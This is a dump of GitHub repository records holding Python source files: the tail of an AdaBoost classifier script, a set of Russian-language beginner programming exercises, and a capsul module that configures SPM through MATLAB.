the weighted error is %.3f\" % (i, threshVal, inequal, weightedError)\n if weightedError < minError:\n minError = weightedError\n bestClasEst = predictedVals.copy()\n bestStump['dim'] = i\n bestStump['thresh'] = threshVal\n bestStump['ineq'] = inequal\n return bestStump,minError,bestClasEst\n\n#基于单层决策树的AdaBoost的训练过程\n#numIt 循环次数,表示构造40个单层决策树\ndef adaBoostTrainDS(dataArr,classLabels,numIt=10):\n weakClassArr = []\n m = shape(dataArr)[0]\n D = mat(ones((m,1))/m) #init D to all equal\n aggClassEst = mat(zeros((m,1)))\n for i in 
range(numIt):\n bestStump,error,classEst = buildStump(dataArr,classLabels,D)#build Stump\n #print \"D:\",D.T\n alpha = float(0.5*log((1.0-error)/max(error,1e-16)))#calc alpha, throw in max(error,eps) to account for error=0\n bestStump['alpha'] = alpha\n weakClassArr.append(bestStump) #store Stump Params in Array\n #print \"classEst: \",classEst.T\n expon = multiply(-1*alpha*mat(classLabels).T,classEst) #exponent for D calc, getting messy\n D = multiply(D,exp(expon)) #Calc New D for next iteration\n D = D/D.sum()\n #calc training error of all classifiers, if this is 0 quit for loop early (use break)\n aggClassEst += alpha*classEst\n #print \"aggClassEst: \",aggClassEst.T\n aggErrors = multiply(sign(aggClassEst) != mat(classLabels).T,ones((m,1))) #这里还用到一个sign函数,主要是将概率可以映射到-1,1的类型\n errorRate = aggErrors.sum()/m\n print \"total error: \",errorRate\n if errorRate == 0.0: break\n return weakClassArr,aggClassEst\n\ndef adaClassify(datToClass,classifierArr):\n dataMatrix = mat(datToClass)#do stuff similar to last aggClassEst in adaBoostTrainDS\n m = shape(dataMatrix)[0]\n aggClassEst = mat(zeros((m,1)))\n for i in range(len(classifierArr)):\n classEst = stumpClassify(dataMatrix,classifierArr[i]['dim'],\\\n classifierArr[i]['thresh'],\\\n classifierArr[i]['ineq'])#call stump classify\n aggClassEst += classifierArr[i]['alpha']*classEst\n print aggClassEst\n return sign(aggClassEst)\n\n#train data\nweak, agg = adaBoostTrainDS(train_X, train_Y)\nprint '====='\nprint weak\nprint len(weak)\nprint '====='\nprint agg\nprint agg.shape\nprint '====='\nres = adaClassify(test_X, weak)\nprint res;\nprint (classification_report(test_Y,res))\n" } ]
4
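The scripts in the record above are Python 2 era code and rely on the pandas `.ix` indexer, which has since been removed. A sketch of the same letter-recognition loading step on a current stack; only the indexing and `print` syntax change.

```python
# Modernized loading step for the AdaBoost scripts above: .loc replaces
# the removed .ix indexer and print() is used as a function.
import pandas as pd

col_name = ['lettr', 'x-box', 'y-box', 'width', 'high', 'onpix',
            'x-bar', 'y-bar', 'x2bar', 'y2bar', 'xybar', 'x2ybr',
            'xy2br', 'x-ege', 'xegvy', 'y-ege', 'yegvx']
data = pd.read_csv("../data/letter-recognition.data", names=col_name)
data_X = data.loc[:, 'x-box':].to_numpy(dtype=float)
data_Y = data['lettr'].map(lambda c: ord(c) - ord('A')).to_numpy(dtype=float)
print(data_X.shape, data_Y.shape)
```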
EvgeniiyaR/tasks
https://github.com/EvgeniiyaR/tasks
2faa89c8df206b36fba1044ae0e0518dc129478c
e3abbb0130026f88889d5c802fd7473ffad6c82a
16a02bfbd85fc5567a9446584c9f1a3ba63d3a77
refs/heads/main
2023-07-23T21:56:31.558552
2021-09-08T14:26:58
2021-09-08T14:26:58
400,779,891
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7136678099632263, "alphanum_fraction": 0.7153978943824768, "avg_line_length": 34.06060791015625, "blob_id": "7d55783f966785499bb8b74819f3afe85dc96489", "content_id": "18e1f2bd3e584f68b6cb4791955c17722ad13e69", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1658, "license_type": "no_license", "max_line_length": 153, "num_lines": 33, "path": "/google_search.py", "repo_name": "EvgeniiyaR/tasks", "src_encoding": "UTF-8", "text": "\"\"\"\n\nНа вход программе подается натуральное число n, затем n строк, затем число k — количество поисковых запросов, затем k строк — поисковые запросы.\nНапишите программу, которая выводит все введенные строки, в которых встречаются все поисковые запросы.\n\nФормат входных данных:\nНа вход программе подаются натуральное число n — количество строк, затем сами строки в указанном количестве, затем число k, затем сами поисковые запросы.\n\nФормат выходных данных:\nПрограмма должна вывести все введенные строки, в которых встречаются все поисковые запросы.\n\nПримечание. Поиск не должен быть чувствителен к регистру символов.\n\n\"\"\"\n\namount_req = int(input())\nlist_req, list_search, result_list = [], [], []\nfor _ in range(amount_req):\n req = str(input())\n list_req.append(req)\namount_search = int(input())\nfor _ in range(amount_search):\n search = str(input())\n list_search.append(search)\nfor item_req in list_req:\n count = 0\n for item_search in list_search:\n if item_search.lower() in item_req.lower():\n count += 1\n if count == amount_search:\n result_list.append(item_req)\nfor item in result_list:\n print(item)" }, { "alpha_fraction": 0.5971394777297974, "alphanum_fraction": 0.6257449388504028, "avg_line_length": 27, "blob_id": "1465b8f4664d33c47b2acc3ee0662612a1d5bd18", "content_id": "e2dfb0aba5685e067291d55270b934c5aa6c5651", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1225, "license_type": "no_license", "max_line_length": 116, "num_lines": 30, "path": "/quadratic_equation.py", "repo_name": "EvgeniiyaR/tasks", "src_encoding": "UTF-8", "text": "\"\"\"\nДаны три вещественных числа aa, bb, cc.\nНапишите программу, которая находит вещественные корни квадратного уравнения\nax^2 + bx + c = 0\n\nФормат входных данных:\nНа вход программе подается три вещественных числа a не равно 0, b, c, каждое на отдельной строке.\n\nФормат выходных данных:\nПрограмма должна вывести вещественные корни уравнения если они существуют или текст «Нет корней» в противном случае.\n\nПримечание. 
Если уравнение имеет два корня, то следует вывести их в порядке возрастания.\n\n\"\"\"\na, b, c = float(input()), float(input()), float(input())\nd = (b**2 - 4 * a * c)\nif d > 0:\n x1 = ((- b + d**0.5) / (2 * a))\n x2 = ((- b - d**0.5) / (2 * a))\n if x1 > x2:\n print(x2)\n print(x1)\n else:\n print(x1)\n print(x2)\nelif d == 0:\n x3 = (- b / (2 * a))\n print(x3)\nelse:\n print(\"Нет корней\")" }, { "alpha_fraction": 0.6742933988571167, "alphanum_fraction": 0.675639271736145, "avg_line_length": 26.55555534362793, "blob_id": "876a2232fe568ac47fe9711592c2a70792d219aa", "content_id": "a395305350d2ac1604fb3ed1c40340dcc9a76cd8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1052, "license_type": "no_license", "max_line_length": 169, "num_lines": 27, "path": "/packaging_of_duplicates.py", "repo_name": "EvgeniiyaR/tasks", "src_encoding": "UTF-8", "text": "\"\"\"\n\nНа вход программе подается строка текста, содержащая символы. Напишите программу, которая упаковывает последовательности одинаковых символов заданной строки в подсписки.\n\nФормат входных данных:\nНа вход программе подается строка текста, содержащая символы, отделенные символом пробела.\n\nФормат выходных данных:\nПрограмма должна вывести указанный вложенный список.\n\n\"\"\"\n\na = input().split(' ')\nnew_list, other_list = [], []\nfor x in a:\n if not other_list:\n other_list.append(x)\n else:\n if other_list[-1] == x:\n other_list.append(x)\n else:\n new_list.append(other_list)\n other_list = []\n other_list.append(x)\nif other_list:\n new_list.append(other_list)\nprint(new_list)" }, { "alpha_fraction": 0.6373239159584045, "alphanum_fraction": 0.6478873491287231, "avg_line_length": 20.037036895751953, "blob_id": "86e0a22e1ee5b94f96441ace85830fadd80a0b97", "content_id": "5b0144eabb70bcdb51cee117a14248ca481b76df", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 845, "license_type": "no_license", "max_line_length": 157, "num_lines": 27, "path": "/star_triangle.py", "repo_name": "EvgeniiyaR/tasks", "src_encoding": "UTF-8", "text": "\"\"\"\nДано нечетное натуральное число n. Напишите программу, которая печатает равнобедренный звездный треугольник с основанием, равным n в соответствии с примером:\n\n*\n**\n***\n****\n***\n**\n*\n\nФормат входных данных:\nНа вход программе подается одно нечетное натуральное число.\n\nФормат выходных данных:\nПрограмма должна вывести треугольник в соответствии с условием.\n\n\"\"\"\nn = int(input())\nfor i in range(n // 2 + 1):\n for j in range(i + 1):\n print(\"*\", end=\"\")\n print()\nfor k in range(n // 2, 0, -1):\n for m in range(k):\n print(\"*\", end=\"\")\n print()\n" }, { "alpha_fraction": 0.5068965554237366, "alphanum_fraction": 0.548275887966156, "avg_line_length": 24.2608699798584, "blob_id": "b35edbac34c497fdbf00213acc4ef9cdece58409", "content_id": "b2755eda80a97e12422d8e342c5b4f8c11d5bc52", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 770, "license_type": "no_license", "max_line_length": 133, "num_lines": 23, "path": "/roots_of_the_equation.py", "repo_name": "EvgeniiyaR/tasks", "src_encoding": "UTF-8", "text": "\"\"\"\n\nНапишите функцию solve(a, b, c), которая принимает в качестве аргументов три целых числа a, b, c – коэффициенты квадратного уравнения\nax^2+bx+c = 0 и возвращает его корни в порядке возрастания.\n\nПримечание 1. 
Гарантируется, что квадратное уравнение имеет корни.\n\n\"\"\"\n\ndef solve(a, b, c):\n d = (b ** 2 - 4 * a * c)\n if d >= 0:\n x1 = ((- b + d ** 0.5) / (2 * a))\n x2 = ((- b - d ** 0.5) / (2 * a))\n if x1 > x2:\n return x2, x1\n return x1, x2\n\n\na, b, c = int(input()), int(input()), int(input())\n\nx1, x2 = solve(a, b, c)\nprint(x1, x2)" }, { "alpha_fraction": 0.6160266995429993, "alphanum_fraction": 0.6160266995429993, "avg_line_length": 41.82143020629883, "blob_id": "1d971afc3bc7a4ca609ea311814a6305321d6d4d", "content_id": "b24f111a8a103483900ab932e21752f862fdc079", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1736, "license_type": "no_license", "max_line_length": 210, "num_lines": 28, "path": "/banned_the_letter_a.py", "repo_name": "EvgeniiyaR/tasks", "src_encoding": "UTF-8", "text": "\"\"\"\n\nНеобходимо написать программу, реализующую алгоритм написания этой песни.\nАлгоритм выводит в конце предложения следующую в алфавитном порядке букву, если она встречается в строке текста, а очередную строку отображает уже без этой буквы.\n\nФормат входных данных:\nНа вход программе подается одно слово, записанное строчными русскими буквами без буквы \"ё\".\n\nФормат выходных данных:\nПрограмма должна вывести в соответствии с указанным алгоритмом строки, количество которых равно количеству разных букв в строке, которая получается путем конкатенации введенного слова и строки \"запретил букву\".\n\n\"\"\"\n\nsome_str = input()\nkey_str = ' запретил букву '\nnew_str = some_str + key_str\nabc = ['а', 'б', 'в', 'г', 'д', 'е', 'ж', 'з', 'и', 'й', 'к', 'л', 'м', 'н', 'о', 'п', 'р', 'с', 'т', 'у', 'ф', 'х', 'ц', 'ч', 'ш', 'щ', 'ъ', 'ы', 'ь', 'э', 'ю', 'я']\nfor i in abc:\n if i in new_str:\n other_str = new_str + i\n if ' ' in other_str:\n another_str = other_str.replace(' ', ' ')\n print(another_str.strip())\n else:\n print(other_str.strip())\n new_str = new_str.replace(i, '').lstrip().replace(' ', ' ')\n if new_str == '':\n break" }, { "alpha_fraction": 0.6778523325920105, "alphanum_fraction": 0.6873601675033569, "avg_line_length": 48.69444274902344, "blob_id": "0744e909154f47c797b8770345d804a8428cb6f4", "content_id": "e95b957da16e2e13ad012f50313fb50fce10267e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2506, "license_type": "no_license", "max_line_length": 296, "num_lines": 36, "path": "/silicon_valley.py", "repo_name": "EvgeniiyaR/tasks", "src_encoding": "UTF-8", "text": "\"\"\"\n\nИскусственный интеллект Антон, созданный Гилфойлом, взломал сеть умных холодильников. Теперь он использует их в качестве серверов \"Пегого дудочника\". Помогите владельцу фирмы отыскать все зараженные холодильники.\n\nДля каждого холодильника существует строка с данными, состоящая из строчных букв и цифр, и если в ней присутствует слово \"anton\" (необязательно рядом стоящие буквы, главное наличие последовательности букв), то холодильник заражен и нужно вывести номер холодильника, нумерация начинается с единицы\n\nФормат входных данных:\nВ первой строке подаётся число nn – количество холодильников. В последующих nn строках вводятся строки, содержащие латинские строчные буквы и цифры, в каждой строке от 55 до 100100 символов.\n\nФормат выходных данных:\nПрограмма должна вывести номера зараженных холодильников через пробел. 
Если таких холодильников нет, ничего выводить не нужно.\n\n\"\"\"\n\nn = int(input())\nsome_str_list = []\ngood_list = ['a', 'n', 't', 'o']\nfor i in range(1, n + 1):\n some_str = input()\n some_str_list.append(some_str)\n new_list = []\n for char in some_str:\n if char in good_list:\n new_list.append(char)\n try:\n char_a_first_list = new_list[new_list.index('a'):]\n char_n_first_list = char_a_first_list[char_a_first_list.index('n'):]\n char_t_first_list = char_n_first_list[char_n_first_list.index('t'):]\n char_o_first_list = char_t_first_list[char_t_first_list.index('o'):]\n char_n_first_list_1 = char_o_first_list[char_o_first_list.index('n'):]\n result = ''.join([char_a_first_list[0], char_n_first_list[0], char_t_first_list[0], char_o_first_list[0],\n char_n_first_list_1[0]])\n if result == 'anton':\n print(i, end=' ')\n except ValueError:\n pass" }, { "alpha_fraction": 0.6967113018035889, "alphanum_fraction": 0.6991474032402039, "avg_line_length": 28.35714340209961, "blob_id": "6852dcd2760514fb4444ab64b16e0425c72ce800", "content_id": "562cc70ce66470af808f5d99e36d6d44ca94425f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1304, "license_type": "no_license", "max_line_length": 138, "num_lines": 28, "path": "/k_letter_of_the_word.py", "repo_name": "EvgeniiyaR/tasks", "src_encoding": "UTF-8", "text": "\"\"\"\n\nНа вход программе подается натуральное число n и n строк, а затем число k.\nНапишите программу, которая выводит k-ую букву из введенных строк на одной строке без пробелов.\n\nФормат входных данных\nНа вход программе подается натуральное число n, далее n строк, каждая на отдельной строке.\nВ конце вводится натуральное число k – номер буквы (нумерация начинается с единицы).\n\nФормат выходных данных\nПрограмма должна вывести текст в соответствии с условием задачи.\n\nПримечание. 
Если некоторые строки слишком короткие, и в них нет символа с заданным номером, то такие строки при выводе нужно игнорировать.\n\n\"\"\"\n\nn = int(input())\ns, k = [], []\nfor i in range(n):\n j = str(input())\n s.append(j)\nk = int(input())\nfor z in s:\n num = 0\n for m in z:\n num += 1\n if num == k:\n print(m, end='')" }, { "alpha_fraction": 0.4343661963939667, "alphanum_fraction": 0.46197181940078735, "avg_line_length": 27.629032135009766, "blob_id": "0fe6deb07a2e8753a96a34f8adf58c4e81458e19", "content_id": "1b78b24c0af459b5b6ff7d6023f314cc4db06ef4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1963, "license_type": "no_license", "max_line_length": 115, "num_lines": 62, "path": "/intersection.py", "repo_name": "EvgeniiyaR/tasks", "src_encoding": "UTF-8", "text": "# пересечение с весом\n\n\"\"\"\nНеобходимо найти итоговую строку слева на право\nВходной формат: [\n {\n 'char': 'a', # буква\n 'coords': [2, 3] # координаты x0, x1\n 'scor': 100 # скоринг от 1 до 100\n }\n]\nЕсли буква пересекается (длина пересечения больше 0) с другой - должна выводиться буква с наибольшим скорингом.\n\"\"\"\n\n\ndef some_func1(module_result):\n for i in range(len(module_result)):\n for j in range(len(module_result)):\n if module_result[i]['coords'][0] < module_result[j - 1]['coords'][0] < module_result[i]['coords'][1]:\n if module_result[i]['char'] != module_result[j - 1]['char']:\n if module_result[i]['scor'] > module_result[j - 1]['scor']:\n print(module_result[i]['char'], end='')\n else:\n print(module_result[j - 1]['char'], end='')\n\n elif module_result[i]['coords'][0] < module_result[j - 1]['coords'][1] < module_result[i]['coords'][1]:\n if module_result[i]['char'] != module_result[j - 1]['char']:\n if module_result[i]['scor'] > module_result[j - 1]['scor']:\n print(module_result[i]['char'], end='')\n else:\n print(module_result[j - 1]['char'], end='')\n\n\nmodule_result = [\n {\n 'char': 'a',\n 'coords': [1, 3],\n 'scor': 70\n },\n {\n 'char': 'b',\n 'coords': [5, 7],\n 'scor': 80\n },\n {\n 'char': 'd',\n 'coords': [6, 8],\n 'scor': 60\n },\n {\n 'char': 'y',\n 'coords': [1, 2],\n 'scor': 90\n },\n {\n 'char': 'z',\n 'coords': [9, 10],\n 'scor': 90\n }\n]\n\nsome_func1(module_result=module_result)\n" }, { "alpha_fraction": 0.7268041372299194, "alphanum_fraction": 0.7396907210350037, "avg_line_length": 31.375, "blob_id": "ae8648f1862b662dcc31e0d420b97d2c6ac99fd4", "content_id": "9ecbabf763bc670182a38d4a30b195ca595a1f03", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1162, "license_type": "no_license", "max_line_length": 120, "num_lines": 24, "path": "/largest_number.py", "repo_name": "EvgeniiyaR/tasks", "src_encoding": "UTF-8", "text": "#наибольшие числа\n\"\"\"\n\nНа вход программе подается натуральное число n, а затем n различных натуральных чисел, каждое на отдельной строке.\nНапишите программу, которая выводит наибольшее и второе наибольшее число последовательности.\n\nФормат входных данных:\nНа вход программе подаются натуральное число n n ≥ 2, а затем n различных натуральных чисел, каждое на отдельной строке.\n\nФормат выходных данных:\nПрограмма должна вывести два наибольших числа, каждое на отдельной строке.\n\n\"\"\"\nnumber_1 = int(input())\nlargest, pre_largest = 0, 0\nfor i in range(number_1):\n number_2 = int(input())\n if number_2 > largest:\n pre_largest = largest\n largest = number_2\n if pre_largest < number_2 < largest:\n pre_largest = 
number_2\nprint(largest)\nprint(pre_largest)" }, { "alpha_fraction": 0.6837725639343262, "alphanum_fraction": 0.6837725639343262, "avg_line_length": 38, "blob_id": "031a5aedbbb9977a564093b2eb4a22b3352c9dda", "content_id": "f2a1cf6894b81d3b5211addffc4ff96c5d19a7fb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1892, "license_type": "no_license", "max_line_length": 106, "num_lines": 37, "path": "/сaesar.py", "repo_name": "EvgeniiyaR/tasks", "src_encoding": "UTF-8", "text": "\"\"\"\n\nНа вход программе подается строка текста на английском языке, в которой нужно зашифровать все слова.\nКаждое слово строки следует зашифровать с помощью шифра Цезаря (циклического сдвига на длину этого слова).\nСтрочные буквы при этом остаются строчными, а прописные – прописными.\n\nФормат входных данных:\nНа вход программе подается строка текста на английском языке.\n\nФормат выходных данных:\nПрограмма должна вывести зашифрованный текст в соответствии с условием задачи.\n\nПримечание. Символы, не являющиеся английскими буквами, не изменяются.\n\n\"\"\"\n\nproposal = input().split()\neng_lower_alphabet = 'abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz'\neng_upper_alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ'\nsymbols = ', .\"!?'\nnew_list = []\nfor i in proposal:\n new_proposal = ''\n step = len(i.replace(',', '').replace('.', '').replace('!', '').replace('\"', ''))\n for j in i:\n if j in symbols:\n new_proposal += j\n elif j == j.upper():\n old_index_upper_e = eng_upper_alphabet.find(j)\n new_index_upper_e = old_index_upper_e + step\n new_proposal += eng_upper_alphabet[new_index_upper_e]\n elif j == j.lower():\n old_index_lower_e = eng_lower_alphabet.find(j)\n new_index_lower_e = old_index_lower_e + step\n new_proposal += eng_lower_alphabet[new_index_lower_e]\n new_list.append(new_proposal)\nprint(' '.join(new_list))" }, { "alpha_fraction": 0.5629322528839111, "alphanum_fraction": 0.5753803849220276, "avg_line_length": 18.567567825317383, "blob_id": "c5a6dd7fe892be7b72dc336f38dc8e3473a119fd", "content_id": "82c2e335bd542a8794932dabd7a0c5e84dc4ec15", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 859, "license_type": "no_license", "max_line_length": 151, "num_lines": 37, "path": "/next_prime.py", "repo_name": "EvgeniiyaR/tasks", "src_encoding": "UTF-8", "text": "\"\"\"\n\nНапишите функцию get_next_prime(num), которая принимает в качестве аргумента натуральное число num и возвращает первое простое число большее числа num.\n\n\"\"\"\n\n\ndef is_prime(num):\n counter = 0\n for i in range(1, num + 1):\n if num % i == 0:\n counter += 1\n if counter == 1:\n return False\n if counter > 2:\n return False\n else:\n return True\n\n\ndef get_next_prime(num):\n while is_prime(num) is True:\n num += 1\n if is_prime(num) is True:\n break\n while is_prime(num) is False:\n num += 1\n if is_prime(num) is True:\n break\n return num\n\n\n# считываем данные\nn = int(input())\n\n# вызываем функцию\nprint(get_next_prime(n))" }, { "alpha_fraction": 0.6541582345962524, "alphanum_fraction": 0.6541582345962524, "avg_line_length": 28.909090042114258, "blob_id": "6f161dd8084acf559718c5efd7003f38828cdd9d", "content_id": "9cf0d130ae25f57b29d373464b12a7bb101ccec6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1375, "license_type": "no_license", "max_line_length": 149, "num_lines": 33, "path": "/splitting_into_chunks.py", "repo_name": 
"EvgeniiyaR/tasks", "src_encoding": "UTF-8", "text": "\"\"\"\n\nНа вход программе подаются две строки, на одной символы, на другой число nn. Из первой строки формируется список.\n\nРеализуйте функцию chunked(), которая принимает на вход список и число, задающее размер чанка (куска), а возвращает список из чанков указанной длины.\n\nФормат входных данных:\nНа вход программе подается строка текста, содержащая символы, отделенные символом пробела и число nn на отдельной строке.\n\nФормат выходных данных:\nПрограмма должна вывести указанный вложенный список.\n\n\"\"\"\n\na = input().split(' ')\nb = int(input())\nnew_list = []\nother_list = []\nfor x in a:\n if not other_list:\n other_list.append(x)\n if len(other_list) == b:\n new_list.append(other_list)\n other_list = []\n else:\n if len(other_list) != b:\n other_list.append(x)\n if len(other_list) == b:\n new_list.append(other_list)\n other_list = []\nif other_list:\n new_list.append(other_list)\nprint(new_list)" } ]
13
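The Caesar task in the record above (сaesar.py) shifts every letter of a word forward by the word's letter count, using a doubled alphabet string to absorb the wraparound. The same shift can be written with modular arithmetic; a compact sketch follows (it counts letters via `isalpha()`, a slight generalization of the original's punctuation stripping).

```python
# Per-word Caesar shift from the task above, with % 26 instead of a
# doubled alphabet string; non-letters pass through unshifted.
def shift_word(word: str) -> str:
    step = sum(ch.isalpha() for ch in word)
    out = []
    for ch in word:
        if ch.isalpha():
            base = ord('A') if ch.isupper() else ord('a')
            out.append(chr(base + (ord(ch) - base + step) % 26))
        else:
            out.append(ch)
    return ''.join(out)

print(' '.join(shift_word(w) for w in "To be, or not to be!".split()))
```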
ylep/capsul
https://github.com/ylep/capsul
b4c06a53a3c0d3133faf846c599e55fdbd4210df
32ccf3867ef9385fb49210fbc611b1fab4f36fa3
bd06fb82c529097155d55e3975f4fc49b8e909dc
refs/heads/master
2019-01-01T14:26:47.316312
2017-12-01T14:41:42
2017-12-01T14:41:42
31,950,435
0
0
null
2015-03-10T10:04:55
2015-03-04T14:36:09
2015-03-04T14:36:08
null
[ { "alpha_fraction": 0.5461695194244385, "alphanum_fraction": 0.5507796406745911, "avg_line_length": 36.41624450683594, "blob_id": "cec6f6d76cfdc1ecb5222eeac6de61a7bc05800b", "content_id": "026fa866c59f345bf091df8220af1c4d6e711cf4", "detected_licenses": [ "LicenseRef-scancode-cecill-b-en" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7375, "license_type": "permissive", "max_line_length": 79, "num_lines": 197, "path": "/capsul/study_config/config_modules/spm_config.py", "repo_name": "ylep/capsul", "src_encoding": "UTF-8", "text": "##########################################################################\n# CAPSUL - Copyright (C) CEA, 2013\n# Distributed under the terms of the CeCILL-B license, as published by\n# the CEA-CNRS-INRIA. Refer to the LICENSE file or to\n# http://www.cecill.info/licences/Licence_CeCILL-B_V1-en.html\n# for details.\n##########################################################################\n\n# System import\nimport os\nimport logging\ntry:\n import subprocess32 as subprocess\nexcept ImportError:\n import subprocess\n\n# TRAITS import\nfrom traits.api import Directory, File, Bool, Enum, Undefined, Str\n\n# CAPSUL import\nfrom capsul.study_config.study_config import StudyConfigModule\n\n# Define the logger\nlogger = logging.getLogger(__name__)\n\ndef find_spm(matlab=None, matlab_path=None):\n \"\"\" Function to return the root directory of SPM.\n\n Parameters\n ----------\n matlab: str (default=None)\n if given, is the path to the MATLAB executable.\n matlab_path: str (default None)\n if given, is a MATLAB expression fed to addpath.\n\n Returns\n -------\n last_line: str\n the SPM root directory\n \"\"\"\n # Script to execute with matlab in order to find SPM root dir\n script = (\"spm8;\"\n \"fprintf(1, '%s', spm('dir'));\"\n \"exit();\")\n\n # Add matlab path if necessary\n if matlab_path:\n script = \"addpath({0});\".format(matlab_path) + script\n\n # Generate the matlab command\n command = [matlab or \"matlab\",\n \"-nodisplay\", \"-nosplash\", \"-nojvm\",\n \"-r\", script]\n\n # Try to execute the command\n try:\n process = subprocess.Popen(command, stdout=subprocess.PIPE)\n except OSError:\n # Matlab is not present\n raise Exception(\"Could not find SPM.\")\n stdout = process.communicate()[0]\n last_line = stdout.split(\"\\n\")[-1]\n\n # Do not consider weird data at the end of the line\n if '\\x1b' in last_line:\n last_line = last_line[:last_line.index('\\x1b')]\n\n # If the last line is empty, SPM not found\n if last_line == \"\":\n raise Exception(\"Could not find SPM.\")\n\n # Debug message\n logger.debug(\"SPM found at location '{0}'.\".format(last_line))\n\n return last_line\n\n\nclass SPMConfig(StudyConfigModule):\n \"\"\" SPM configuration.\n\n There is two ways to configure SPM:\n * the first one requires to configure matlab and then to set the spm\n directory.\n * the second one is based on a standalone version of spm and requires\n to set the spm executable directory.\n \"\"\"\n\n dependencies = [\"MatlabConfig\"]\n\n def __init__(self, study_config, configuration):\n \"\"\" Initialize the SPMConfig class.\n \"\"\"\n super(SPMConfig, self).__init__(study_config, configuration)\n self.study_config.add_trait(\"spm_standalone\", Bool(\n False,\n desc=\"If True, use the standalone version of SPM.\"))\n self.study_config.add_trait(\"spm_directory\", Directory(\n Undefined,\n output=False,\n desc=\"Directory containing SPM.\"))\n self.study_config.add_trait(\"spm_exec\", File(\n Undefined,\n output=False,\n 
desc=\"SPM standalone (MCR) command path.\"))\n self.study_config.add_trait(\"use_spm\", Bool(\n Undefined,\n desc=\"If True, SPM configuration is set up on startup.\"))\n self.study_config.add_trait('spm_version', Str(\n Undefined, output=False,\n desc='Version string for SPM: \"12\", \"8\", etc.'))\n\n def initialize_module(self):\n \"\"\" Set up SPM environment according to current configuration.\n \"\"\"\n if self.study_config.use_spm is False:\n # Configuration is explicitely asking not to use SPM\n return\n elif self.study_config.use_spm is True:\n # If use_spm is True configuration must be valid otherwise\n # an EnvironmentError is raised\n force_configuration = True\n else:\n # If use_spm is not defined, SPM configuration will\n # be done if possible but there will be no error if it cannot be\n # done.\n force_configuration = False\n self.study_config.use_spm = True\n\n # If we need to check spm configuration\n if self.study_config.use_spm is True:\n\n # If standalone\n if self.study_config.spm_standalone is True:\n\n # Check that a valid file has been set for the stanalone\n # version of spm\n if (self.study_config.spm_exec is Undefined or \n not os.path.isfile(self.study_config.spm_exec)):\n self.study_config.use_spm = False\n if force_configuration:\n raise EnvironmentError(\"'spm_exec' must be defined in \"\n \"order to use SPM-standalone.\")\n else:\n return\n\n # determine SPM version (currently 8 or 12)\n if os.path.isdir(os.path.join(\n self.study_config.spm_directory, 'spm12_mcr')):\n self.study_config.spm_version = '12'\n elif os.path.isdir(os.path.join(\n self.study_config.spm_directory, 'spm8_mcr')):\n self.study_config.spm_version = '8'\n else:\n self.study_config.spm_version = Undefined\n\n # If not standalone\n else:\n\n # Check that Matlab is activated\n if not self.study_config.use_matlab:\n self.study_config.use_spm = False\n if force_configuration:\n raise EnvironmentError(\n \"Matlab is disabled. Cannot use SPM via Matlab.\")\n else:\n return\n\n # If the spm sources are not set, try to find them automaticaly\n if self.study_config.spm_directory is Undefined:\n self.study_config.spm_directory = find_spm(\n self.study_config.matlab_exec)\n\n # Check that a valid directory has been set for spm sources\n if not os.path.isdir(self.study_config.spm_directory):\n self.study_config.use_spm = False\n if force_configuration:\n raise EnvironmentError(\n \"'{0}' is not a valid SPM directory.\".format(\n self.study_config.spm_directory))\n else:\n return\n\n # determine SPM version (currently 8 or 12)\n if os.path.isdir(os.path.join(\n self.study_config.spm_directory, 'toolbox', 'OldNorm')):\n self.study_config.spm_version = '12'\n elif os.path.isdir(os.path.join(\n self.study_config.spm_directory, 'templates')):\n self.study_config.spm_version = '8'\n else:\n self.study_config.spm_version = Undefined\n\n def initialize_callbacks(self):\n \"\"\" When the 'use_spm' trait changes, configure spm with the new\n setting.\n \"\"\"\n self.study_config.on_trait_change(self.initialize_module, \"use_spm\")\n \n" } ]
1
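A hedged sketch of exercising the module above through `StudyConfig`. The `capsul.api` import path and keyword-trait initialization reflect typical capsul usage and are assumptions; the paths are placeholders, and with invalid paths plus `use_spm=True` the `initialize_module()` shown above raises `EnvironmentError`.

```python
# Sketch only: replace the placeholder paths with a real SPM-standalone
# install before running, otherwise initialization raises EnvironmentError.
from capsul.api import StudyConfig  # assumed public import path

study_config = StudyConfig(
    use_spm=True,
    spm_standalone=True,
    spm_exec="/usr/local/spm12/run_spm12.sh",  # placeholder path
    spm_directory="/usr/local/spm12",          # placeholder path
)
print(study_config.spm_version)  # '12', '8', or Undefined per the module
```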
Lun4m/PeptideBuilder
https://github.com/Lun4m/PeptideBuilder
673e6e7fd177004a5c2dd97c2c76170b6481a5bb
b056f8958dbd8a820df717e39e29c933ffa6899a
918426a9daeaa23492e65f795620259f8317b959
refs/heads/master
2023-04-01T14:59:47.366433
2021-04-06T12:50:30
2021-04-06T12:50:30
300,332,562
2
0
MIT
2020-10-01T15:41:52
2020-08-24T13:44:21
2020-04-05T21:27:43
null
